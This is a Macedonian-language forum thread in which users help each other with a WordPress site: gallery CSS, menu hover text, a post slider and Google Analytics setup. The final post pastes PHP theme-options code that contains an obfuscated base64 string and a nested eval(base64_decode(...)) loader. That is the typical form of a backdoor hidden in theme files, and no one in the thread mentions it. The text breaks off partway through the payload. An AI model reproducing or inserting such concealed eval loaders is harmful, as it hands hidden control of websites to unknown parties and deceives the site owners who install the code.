Прегледај го приврзокот all.zip
Ова ли го бараше?
Ова ли го бараше?
пробај ова смени го во 100 наместо 2Прегледај го приврзокот 34926
Ова ли го бараше?
да ...Вака мислеше?
Код:.gallery-items li.active{z-index:100;}
активна ли ти е web странава да дадеш линкЏабе пак нејке
ај врати го тоа по старо ..Не офлине ја работам :S
Гугл аналитикс активирај го преку gmail акаунтот .. адни ја страната во Webmaster tools, и активирај ја, верифицирај ја .. па активирај Аналитикс ..Ај помош за страната погоре што ја постирав...Како да го тгнам текстот од менито што ке се појави на mouseover и како да сменам флешот односно да си го сменам не го сакам тој сакам некој сличен како на семос што е или некој друг кој ке ги дава најновите 4-5 статии...и од кај да го најдам google analytics кодот?
еве го кодот...Гугл аналитикс активирај го преку gmail акаунтот .. адни ја страната во Webmaster tools, и активирај ја, верифицирај ја .. па активирај Аналитикс ..
за менито треба да избришеш насловот на мениата .. односно тоа шо се додава „View all posts filed under ....“ е сега каде точно е тоа треба да најдеш низ кодот ..
и за флешот .. треба да најдеш од каде ги зема/чита постовите .. па да средиш пак со смена на код .. шознам вака на невидено како да ти објаснам или да ти објасни некој ..
array( "name" => "Slider settings",
"type" => "title",
"desc" => "This section customizes the Sliding panel.",
),
array( "type" => "open"),
array( "name" => "Slider post Category",
"desc" => "Select the category from which you want to display the featured posts.",
"id" => $shortname."_gldcat",
"std" => "Select a category:",
"type" => "select",
"options" => $zm_categories),
array( "name" => "Number of slides",
"desc" => "Enter the number of posts to display .",
"id" => $shortname."_gldct",
"std" => "4",
"type" => "text",
),
array( "type" => "close"),
array( "name" => "Featured post settings",
"type" => "title",
"desc" => "This section customizes the featured post lists on the sidebar.",
),
array( "type" => "open"),
array( "name" => "Featured post Category",
"desc" => "Select the category from which you want to display the featured posts.",
$o="QAAADTs4d293J25pZGtyY2InLwAAU0JKV0tGU0JXRlNPJyknIACAKGVoc3NoaikCUCAuPCc4OQ4AAA0NO2NucSduYzolYWhoc2ICCHUlJzkNDgFTZGtmdHQBgGtiYQAAcyU5DQ1DYnRuYGknZX49JwAAO2Ynb3ViYTolb3Nzdz0oKAAAampob3JzKWRoaiglOUpKSAAAVVdAdDsoZjknJztldSg5DQAJRGh3fnVuYG9zJyFkALA8JwqTAAliZG9oJ2Nmc2IvIF4JEDg5AYQAAmVraGBuaWFoLyBpZmpiAaMhBgBpY2Z0bwOlAidjYnRkdW53c242gGhpApANQA0HMwYjIw1hJzonYGJzWEByaAJSLyB1YmNqWAGBAwEIMnRzBCB0hjoO8G9idC8DMhHiDTsoEdAPoBJCZAIAdPoyEPAMghEAEE8QRmALYGtudBNgEMMnSwDQO1AEKBEBexPOcHBwKW9odHNxE/RRVxHAVCdPAQBuaWADPxbzAzFkbnVzYn/gPgORApADtFBiZXRuc2ID+hDkGxURcxP3dQEBdHQ1WHJ1axDBODklOVRyZRUBAeBlYidzaCdXCHAcgwt4BC1kaGpqYg3gaXN0WAS/BLhEAmQNMRWFFXggZGtiZhHIdSA5FyMODQ4AkynwLSJwdxsSYnUvwQoZkwQgZWhjfjkAgG9zamsmgCcAEA==";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsb